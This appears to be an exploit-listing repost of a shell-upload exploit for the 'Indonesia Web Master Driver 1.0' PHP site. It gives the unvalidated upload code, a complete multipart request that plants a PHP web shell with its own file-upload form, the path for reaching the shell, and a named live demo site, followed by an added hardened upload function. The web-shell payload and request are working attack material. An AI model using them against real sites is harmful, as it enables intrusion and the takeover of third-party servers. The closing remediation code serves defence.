Indonesia Web Master Driver 1.0 - Shell Upload

CVE: N/A
Category: CWE-434
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2022-10-12
CVSS: Not available

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022100031

Below is a copy:

# Exploit Title: Indonesia Web Master Driver 1.0 - Shell Upload
# Date: 10-10-2022
# Exploit Author: X-DEX
# Vendor Homepage: https://themeforest.net/user/webmasterdriver
# Version: v1.0
# Tested on: Kali Linux

----- POC -----

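Note: the vulnerability is in http://localhost/registact.php, which stores both uploads under image/id/ using the client-supplied file name, with no check of extension or content: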
"
$image1=$_FILES["img1"]["name"];
$image2=$_FILES["img2"]["name"];
$newimg1 = date('dmYHis').$image1;
$newimg2 = date('dmYHis').$image2;
move_uploaded_file($_FILES["img1"]["tmp_name"],"image/id/".$newimg1);
move_uploaded_file($_FILES["img2"]["tmp_name"],"image/id/".$newimg2);
"
---------------
Request : URL - http://localhost/registact.php
===============
use burpsuite

POST /registact.php HTTP/1.1
Host: http://localhost
Content-Length: 1007
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryLBXMHTxHs8OmgM8w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="MAX_FILE_SIZE"

512000
------WebKitFormBoundaryLBXMHTxHs8OmgM8w
Content-Disposition: form-data; name="img1"; filename="m.php"
Content-Type: application/x-php

<?php
 echo "<body bgcolor=black>";
echo "<p><div align=center><font color=#ff9933 font size=6> <3 INDI</font><font color=white font size=6>SHELL</font><font color=green font size=6>=FTW <3 </font><p><form method=post enctype=multipart/form-data name=uploader >"; 
echo "<input type=file name=file size=50>&nbsp&nbsp&nbsp&nbsp<input  type=submit  name=sut value=Upload></form>"; 
if( isset($_POST['sut']) )
 {
      if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name']))
       { 
     echo "<font color=red size=2 face=\"comic sans ms\">upload done :D<br><br>"; 
     }   
       else {
     echo "<font color=red size=2 face=\"comic sans ms\">Upload failed :P<br>"; 
     } 
         } 
 ?>
------WebKitFormBoundaryLBXMHTxHs8OmgM8w--

Response

HTTP/1.1 200 OK
Connection: close
x-powered-by: localhost
set-cookie: PHPSESSID=164455c4fc628fc476d48023c0f44e2e; path=/
expires: Thu, 19 Nov 1981 08:52:00 GMT
cache-control: no-store, no-cache, must-revalidate
pragma: no-cache
content-type: text/html; charset=UTF-8
Content-Length: 153
vary: Accept-Encoding,User-Agent
date: Tue, 11 Oct 2022 02:21:20 GMT
server: LiteSpeed
x-xss-protection: 1; mode=block
x-content-type-options: nosniff

<script>alert('Email sudah terdaftar, silahkan gunakan email lain!');</script><script type='text/javascript'> document.location = 'regist.php'; </script>

shell access = http://localhost/image/id/date('dmYHis')m.php
date('dmYHis') use your brain hihihihi
Demo site : https://panjitrans.net/registact.php
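
A hardened form of the upload handling in the registact.php snippet quoted in the advisory above, as an added example (not code from the advisory or the vendor). The function name store_id_image, the constants and the storage path are assumptions; it requires PHP 7 or later with the fileinfo extension.

```php
<?php
declare(strict_types=1);

// Assumption: a directory outside the document root, so stored files are
// never reachable by URL or handed to the PHP interpreter.
const ID_UPLOAD_DIR = '/var/www/private/id-images';
const MAX_BYTES     = 512000; // same value as the form's MAX_FILE_SIZE field

// Allowlist: MIME type detected from content => extension chosen by the server.
const ALLOWED_TYPES = ['image/jpeg' => 'jpg', 'image/png' => 'png'];

// Hypothetical helper: validates one $_FILES entry and stores it under a
// server-generated name. Returns that name; throws RuntimeException on rejection.
function store_id_image(array $file): string
{
    if (!isset($file['error'], $file['tmp_name']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or malformed');
    }
    $tmp = $file['tmp_name'];
    if (!is_string($tmp) || !is_uploaded_file($tmp)) {
        throw new RuntimeException('not an HTTP upload');
    }
    // MAX_FILE_SIZE is only a client-side hint; enforce the limit here.
    $size = filesize($tmp);
    if ($size === false || $size === 0 || $size > MAX_BYTES) {
        throw new RuntimeException('file size out of range');
    }
    // Decide the type from the file contents, never from the client-supplied
    // file name or Content-Type header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmp);
    $ext  = is_string($mime) ? (ALLOWED_TYPES[$mime] ?? null) : null;
    if ($ext === null || getimagesize($tmp) === false) {
        throw new RuntimeException('not an accepted image type');
    }
    // Discard the client file name entirely: random name, allowlisted extension.
    // A file that is both a valid image and PHP source still gets a non-.php name.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($tmp, ID_UPLOAD_DIR . '/' . $name)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

// In registact.php, in place of the two move_uploaded_file() calls:
//   $newimg1 = store_id_image($_FILES['img1']);
//   $newimg2 = store_id_image($_FILES['img2']);
```

If the images must remain under the web root, the web server should additionally be configured not to execute scripts in that directory.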
